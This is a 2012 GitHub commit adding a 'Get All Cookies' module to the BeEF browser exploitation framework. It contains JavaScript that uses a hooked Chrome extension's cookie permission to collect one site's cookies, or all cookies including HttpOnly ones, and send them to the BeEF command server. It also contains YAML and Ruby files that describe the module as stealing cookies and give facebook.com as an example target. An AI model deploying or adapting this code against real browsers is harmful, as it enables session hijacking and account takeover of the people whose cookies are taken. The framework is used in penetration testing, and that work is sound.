Permalink
Browse files

Chrome extension module for stealling cookies inc. HTTPonly

  • Loading branch information...
mike-at-aura committed May 29, 2012
1 parent 172ec56 commit 5aa2cefc431cf8feccb2c75ae91fa3f61ac5a303
@@ -0,0 +1,29 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+ the_url = "<%== @url %>";
+ if (the_url != 'default_all') {
+ chrome.cookies.getAll({url:the_url}, function(cookies){
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'cookies: ' + JSON.stringify(cookies));
+ })
+ } else {
+ chrome.cookies.getAll({}, function(cookies){
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'cookies: ' + JSON.stringify(cookies));
+ })
+ }
+
+});
+
@@ -0,0 +1,26 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ get_all_cookies:
+ enable: true
+ category: "Chrome Extensions"
+ name: "Get All Cookies"
+ description: "Steal cookies even HTTPonly ones (providing the hooked extension has cookies access)<br />If a URL to steal cookies from is not specified then will steal _all_ cookies (this can be a lot!)"
+ authors: ["mh"]
+ target:
+ working: ["C"]
+ not_working: ["All"]
@@ -0,0 +1,31 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Get_all_cookies < BeEF::Core::Command
+
+ def self.options
+
+ return [
+ {'name' =>'url', 'ui_label'=>'Domain to steal cookies from e.g. http://facebook.com', 'value' => 'default_all'}
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['Return'] = @datastore['return']
+ save content
+ end
+
+end

0 comments on commit 5aa2cef

Please sign in to comment.